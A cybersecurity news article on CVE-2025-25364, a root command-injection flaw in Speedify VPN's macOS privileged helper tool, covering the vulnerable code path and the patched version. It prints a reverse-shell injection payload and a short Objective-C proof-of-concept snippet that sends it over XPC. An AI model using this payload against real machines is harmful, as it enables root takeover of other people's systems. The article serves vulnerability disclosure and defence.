Cyber Security News

Speedify VPN Vulnerability on macOS Exposes Users to System Takeover

A major security flaw in the Speedify VPN application for macOS, tracked as CVE-2025-25364, has exposed millions of users to the risk of complete system compromise.

Researchers at SecureLayer7 discovered the vulnerability in Speedify’s privileged helper tool. It could potentially allow local attackers to execute arbitrary commands as root and take total control of affected systems.

CVE-2025-25364: A Critical Command Injection Vulnerability

The root of the problem lies within the me.connectify.SMJobBlessHelper XPC service—a helper tool that runs with elevated (root) privileges to perform system-level network operations for Speedify.

This service, installed as a privileged daemon via /Library/PrivilegedHelperTools/me.connectify.SMJobBlessHelper, is configured to receive and process commands from the main Speedify app via Apple’s XPC messaging system.

AspectDetails
CVE IDCVE-2025-25364
Affected ProductSpeedify VPN
Affected Version15.0.0 (macOS)
Patched Version15.4.1
Componentme.connectify.SMJobBlessHelper (Privileged Helper Tool at /Library/PrivilegedHelperTools/)
Vulnerability TypeCommand Injection

Due to improper input validation, particularly of the cmdPath and cmdBin fields in incoming XPC messages, a local attacker can craft a malicious payload.

These fields are directly embedded into the command execution logic without sanitization, enabling an attacker to inject arbitrary shell commands, which the helper tool then executes with root privileges.

Three key functions are at the heart of this vulnerability:

  1. XPC Message Handler: Accepts and parses incoming XPC messages, directing those with a “runSpeedify” request to a launch handler with no input validation.
  2. _handleLaunchSpeedifyMsg: Extracts cmdPath and cmdBin directly from the input and initiates program execution.
  3. _RunSystemCmd: Constructs a shell command from these fields and calls system() to execute it. This line illustrates the injection risk:

rax = asprintf(&var_38, “codesign -v -R=\”certificate leaf[subject.CN] = \”%s\” and anchor apple generic\” \”%s\””, “…”, rcx);

A threat actor can set cmdBin or cmdPath to a string such as “; bash -i >& /dev/tcp/127.0.0.1/1339 0>&1; echo ” to open a root shell connection to an external server.

Researchers released a proof-of-concept (PoC) exploit written in Objective-C, using the XPC APIs to connect to the vulnerable helper and send a crafted payload.

The payload triggers arbitrary code execution as root, such as spawning a reverse shell. Here’s a relevant snippet:

xpc_dictionary_set_string(message, "cmdPath", "/tmp");

const char *injectionPayload = "\"; bash -i >& /dev/tcp/127.0.0.1/1339 0>&1; echo \"";

xpc_dictionary_set_string(message, "cmdBin", injectionPayload);

The impact of this flaw is critical: an attacker with local access could gain full root control, modify sensitive files, install persistent malware, and exfiltrate data.

Since most Speedify VPN users rely on the app for privacy, this vulnerability could have undermined the security of a broad user base.

Speedify users are strongly advised to upgrade to version 15.4.1 or above, which addresses the flaw with a complete helper tool rewrite, stricter input validation, and the removal of insecure XPC handling.

The incident highlights the paramount importance of rigorous input validation in all privileged code.

Find this News Interesting! Follow us on Google NewsLinkedIn, & X to Get Instant Updates!

Divya

Divya is a Senior Journalist at GBhackers covering Cyber Attacks, Threats, Breaches, Vulnerabilities and other happenings in the cyber world.

Recent Posts

PoC Tool Released to Detect Servers Affected by Critical Apache Parquet Vulnerability

F5 Labs has released a new proof-of-concept (PoC) tool designed to help organizations detect servers…

14 minutes ago

Healthcare Sector Becomes a Major Target for Cyber Attacks in 2025

The healthcare sector has emerged as a prime target for cyber attackers, driven by the…

27 minutes ago

SysAid ITSM Vulnerabilities Enables Pre-Auth Remote Command Execution

Security researchers have disclosed a chain of critical vulnerabilities affecting SysAid ITSM’s On-Premise solution, enabling…

55 minutes ago

CISA Warns of Cyber Threats to Oil and Gas SCADA and ICS Networks

The Cybersecurity and Infrastructure Security Agency (CISA) has issued a new alert warning critical infrastructure…

1 hour ago

Russian Company Gains Full Control Over Critical Open Source Easyjson Library

A startling discovery by Hunted Labs has brought to light a potential security risk lurking…

1 hour ago

Researchers Simulate DPRK’s Largest Cryptocurrency Heist Through Compromised macOS Developer and AWS Pivoting

Security researchers at Elastic have recreated the intricate details of the February 21, 2025, ByBit…

2 hours ago